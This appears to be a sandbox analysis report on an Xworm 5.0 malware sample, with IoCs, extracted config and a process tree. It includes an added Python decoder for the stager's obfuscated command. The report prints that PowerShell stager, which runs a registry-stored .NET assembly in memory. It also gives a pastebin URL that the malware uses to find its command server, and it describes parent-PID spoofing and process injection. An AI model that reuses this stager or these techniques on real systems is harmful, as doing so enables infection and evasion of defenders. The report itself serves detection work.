Analysis
- max time kernel: 150s
- max time network: 17s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 31/10/2024, 03:27
- Static task: static1
- Behavioral task: behavioral1
  - Sample: DeadPayload.exe
  - Resource: win7-20240903-en
General
- Target: DeadPayload.exe
- Size: 500KB
- MD5: 32a460b41d3309d8fd5512dce58357d9
- SHA1: b83e6686de15c57184ae8b8be80d0b5b323f3712
- SHA256: 0287c741bae11fcfebf9f7d81b1f663379f531855ef381faecdc006ef689c25c
- SHA512: dc8e37a4aa54519b7578247b9a95b70a446667c15f799ba30dcf14a49858ed2dfa79287476532f62d7e6c44de372dd9035e5d881794c7266dab31c6955fd15e4
- SSDEEP: 12288:f3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd7:3kGTy
Malware Config
Extracted
- Family: xworm
- Version: 5.0
- bbz3FQzIYGOJF400 (config value reported without a label)
- Install_directory: %Public%
- install_file: ohh.exe
- pastebin_url: https://pastebin.com/raw/J09JweeH

Notes on the extracted config: Xworm resolves its C2 address at runtime by fetching this pastebin URL, so the C2 host is not in the static config and the paste content itself is not captured in this report. The Install_directory matches where the dropped executables land (C:\Users\Public), but the configured install_file name ohh.exe does not appear among the files executed in this run (DeadMan.exe and DeadRoot.exe).
Signatures
- Detect Xworm Payload (2 IoCs)
  - yara_rule family_xworm: behavioral1/files/0x0008000000015d0d-6.dat
  - yara_rule family_xworm: behavioral1/memory/1832-8-0x0000000000B00000-0x0000000000B0E000-memory.dmp (memory of PID 1832, DeadMan.exe)
- Modifies security service (2 TTPs, 2 IoCs)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP (svchost.exe)
  - Set value (data): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection (svchost.exe)
  - Caveat: MpsSvc is the Windows Firewall service and the writing process is its own service host (svchost.exe -k LocalServiceNetworkRestricted, PID 756), not one of the sample's processes. Treat this hit as likely ordinary firewall-service activity unless corroborated.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  - PID 2072 (powershell.EXE) created a process with parent PID 428 (winlogon.exe). This is parent-PID spoofing: the child is dllhost.exe (PID 2692), which therefore appears under winlogon.exe in the process tree although powershell.EXE started it.
- Xworm family (no IoCs listed)
- Executes dropped EXE (2 IoCs)
  - PID 1832 DeadMan.exe
  - PID 2128 DeadRoot.exe
- Command and Scripting Interpreter: PowerShell (1 IoC; heading restored from the process tree, where the same signature is listed for this process)
  - PID 2072 powershell.EXE
- Drops file in System32 directory (1 IoC)
  - File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- Suspicious use of SetThreadContext (1 IoC)
  - PID 2072 (powershell.EXE) set thread context of PID 2692 (dllhost.exe); together with the WriteProcessMemory events below this is the pattern of code injection into the freshly created dllhost.exe.
- Enumerates physical storage devices (1 TTP)
  - Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  - Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (DeadRoot.exe)
- Modifies data under HKEY_USERS (2 IoCs)
  - Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.EXE)
  - Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 008495e4442bdb01 (powershell.EXE)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  - PID 2072 powershell.EXE (2 events)
  - PID 2692 dllhost.exe (62 events)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  - Token: SeDebugPrivilege, PID 1832 DeadMan.exe
  - Token: SeDebugPrivilege, PID 2072 powershell.EXE (2 events)
  - Token: SeDebugPrivilege, PID 2692 dllhost.exe
  - Token: SeAuditPrivilege, PID 840 svchost.exe
- Suspicious use of WriteProcessMemory (41 IoCs), grouped by source and target
  - PID 2872 DeadPayload.exe wrote to PID 1832 DeadMan.exe (3 writes) and PID 2128 DeadRoot.exe (4 writes)
  - PID 1964 taskeng.exe wrote to PID 2072 powershell.EXE (3 writes)
  - PID 2072 powershell.EXE wrote to PID 2692 dllhost.exe (9 writes)
  - PID 2692 dllhost.exe wrote once into each of 22 processes: 428 winlogon.exe, 472 services.exe, 488 lsass.exe, 496 lsm.exe, 596, 672, 756, 812, 840, 964, 108, 1064 and 1476 (svchost.exe instances), 344 spoolsv.exe, 1108 taskhost.exe, 1160 Dwm.exe, 1204 Explorer.EXE, 1664 DllHost.exe, 2860 sppsvc.exe, 1964 taskeng.exe, 2072 powershell.EXE, 2916 conhost.exe. Writing into essentially every process on the host, including lsass.exe and winlogon.exe, is the most significant finding in this run and is what the SeDebugPrivilege acquisition by dllhost.exe enables.
Processes
Indentation shows the parent/child relationship as recorded by the sandbox; per-process signature hits follow on a "signatures:" line.

- C:\Windows\system32\winlogon.exe (PID 428)
  - C:\Windows\System32\dllhost.exe /Processid:{6c6dc1d8-c8de-46c9-ac92-35d67c8d52eb} (PID 2692)
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    Note: the real creator is powershell.EXE (PID 2072), which spoofed winlogon.exe as the parent (see NtCreateUserProcessOtherParentProcess above).
- C:\Windows\system32\services.exe (PID 472)
  - C:\Windows\system32\svchost.exe -k DcomLaunch (PID 596)
    - C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} (PID 1664)
  - C:\Windows\system32\svchost.exe -k RPCSS (PID 672)
  - C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted (PID 756)
    signatures: Modifies security service
  - C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted (PID 812)
    - C:\Windows\system32\Dwm.exe (PID 1160)
  - C:\Windows\system32\svchost.exe -k netsvcs (PID 840)
    signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\taskeng.exe {912D90F6-8C3A-4991-A213-11C5EA122625} S-1-5-18:NT AUTHORITY\System:Service: (PID 1964)
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2072), launched by the scheduled task as SYSTEM with the command line:
        powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+'D'+''+[Char](101)+''+[Char](97)+''+'d'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\svchost.exe -k LocalService (PID 964)
  - C:\Windows\system32\svchost.exe -k NetworkService (PID 108)
  - C:\Windows\System32\spoolsv.exe (PID 344)
  - C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork (PID 1064)
  - C:\Windows\system32\taskhost.exe (PID 1108)
  - C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation (PID 1476)
  - C:\Windows\system32\sppsvc.exe (PID 2860)
- C:\Windows\system32\lsass.exe (PID 488)
- C:\Windows\system32\lsm.exe (PID 496)
- C:\Windows\Explorer.EXE (PID 1204)
  - C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe (PID 2872)
    signatures: Suspicious use of WriteProcessMemory
    - C:\Users\Public\DeadMan.exe (PID 1832)
      signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Public\DeadRoot.exe (PID 2128)
      signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
- \??\C:\Windows\system32\conhost.exe "1426204879-12045989041528601166-663992467725422111-1871024949-1871114557-774059290" (PID 2916)

Execution chain in short: DeadPayload.exe drops and runs DeadMan.exe (the Xworm payload, per the YARA hit on its memory) and DeadRoot.exe from C:\Users\Public. Separately, a scheduled task (taskeng.exe, running as SYSTEM) starts powershell.EXE, which loads a .NET assembly stored in a registry value and runs it in memory; that code creates dllhost.exe with winlogon.exe as a spoofed parent, injects into it, and dllhost.exe then writes into nearly every process on the system.
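The PowerShell command line started by taskeng.exe hides its strings as '+'-joined single-quoted fragments and [Char](N) casts. The following Python script is an added example, not part of the sandbox report or of the sample's own code; it resolves that obfuscation and reports which registry value the stager loads its .NET assembly from. The command text is copied from the process tree; the function names, the hive abbreviation table and the tolerant tokenizer are this example's own assumptions about how far the decoding should go.

```python
"""Resolve the string obfuscation in the Xworm stager's PowerShell command line.

The command stores every string as a '+'-joined mix of single-quoted literals
and [Char](N) casts. This resolves them and reports which registry value holds
the .NET assembly that [Reflection.Assembly]::Load() executes in memory.
"""
import re

# Command line copied from the taskeng.exe -> powershell.EXE entry in the process tree.
COMMAND = (
    "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey("
    "''+'S'+'O'+[Char](70)+'T'+'W'+'A'+'R'+''+[Char](69)+'').GetValue("
    "''+'D'+''+[Char](101)+''+[Char](97)+''+'d'+'s'+[Char](116)+''+'a'+''"
    "+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
)

# One token: a single-quoted literal ('' inside is an escaped quote) or a [Char](N) cast.
TOKEN = re.compile(r"'((?:[^']|'')*)'|\[Char\]\((\d+)\)", re.IGNORECASE)

# .NET Registry base-key property -> conventional hive abbreviation (example's own table).
HIVES = {"LocalMachine": "HKLM", "CurrentUser": "HKCU", "Users": "HKU",
         "ClassesRoot": "HKCR", "CurrentConfig": "HKCC"}


def deobfuscate(expr: str) -> str:
    """Evaluate a '+'-joined expression of quoted literals and [Char](N) casts.

    Anything else (variables, method calls, format operators) raises ValueError
    instead of producing a silently wrong decode.
    """
    out, pos = [], 0
    while pos < len(expr):
        if expr[pos] in " \t+":          # separators between tokens
            pos += 1
            continue
        m = TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported token at offset {pos}: {expr[pos:pos + 16]!r}")
        if m.group(1) is not None:
            out.append(m.group(1).replace("''", "'"))   # PowerShell single-quote escape
        else:
            out.append(chr(int(m.group(2))))           # [Char](N)
        pos = m.end()
    return "".join(out)


def call_argument(cmd: str, method: str) -> str:
    """Return the argument text of the first `method(` call in cmd.

    Tracks parenthesis depth and single-quote state so the '(' in [Char](70)
    or a ')' inside a literal does not end the argument early.
    """
    start = cmd.index(method + "(") + len(method) + 1
    depth, in_quote = 1, False
    for i in range(start, len(cmd)):
        ch = cmd[i]
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote and ch == "(":
            depth += 1
        elif not in_quote and ch == ")":
            depth -= 1
            if depth == 0:
                return cmd[start:i]
    raise ValueError(f"unbalanced parentheses in {method}( call")


def resolve_registry_target(cmd: str) -> dict:
    """Recover hive, subkey and value name of the registry-stored assembly."""
    hive_match = re.search(r"\[Microsoft\.Win32\.Registry\]::(\w+)", cmd)
    hive = HIVES.get(hive_match.group(1), hive_match.group(1)) if hive_match else "?"
    subkey = deobfuscate(call_argument(cmd, ".OpenSubkey"))
    value = deobfuscate(call_argument(cmd, ".GetValue"))
    return {"hive": hive, "subkey": subkey, "value": value,
            "path": f"{hive}\\{subkey}\\{value}"}


if __name__ == "__main__":
    target = resolve_registry_target(COMMAND)
    print(f"assembly loaded from registry value: {target['path']}")
    print("executed via [Reflection.Assembly]::Load(...).EntryPoint.Invoke($Null,$Null)")
```

Decoding gives HKLM\SOFTWARE with value name Deadstager: the stager is a .NET assembly kept as registry data rather than as a file on disk, which is why the process tree shows no dropped stager executable for the powershell.EXE branch. On a suspected host the two things to check are that registry value and the scheduled task whose GUID appears on the taskeng.exe command line.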
Network
MITRE ATT&CK Enterprise v15
Downloads
- File (name not shown in report)
  - Filesize: 34KB
  - MD5: de5bb947d72f5167c12b02f85cb0ef32
  - SHA1: cb5b5b754e196ec3072816cb6e250d7dd703752b
  - SHA256: 66f4ceed7b605df523601dc9a35ccf271be390f4c1d12772c6a047ea970081cd
  - SHA512: 26763a5ffc87a77b7e25687d900d32baf67c9e45e51a970c683dc1499c37c52b83b5757c3929cf117af8c5fd494491e063fdf88be9609867bd98379d06e83c33
- File (name not shown in report)
  - Filesize: 151KB
  - MD5: b8479a23c22cf6fc456e197939284069
  - SHA1: b2d98cc291f16192a46f363d007e012d45c63300
  - SHA256: 18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
  - SHA512: 786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4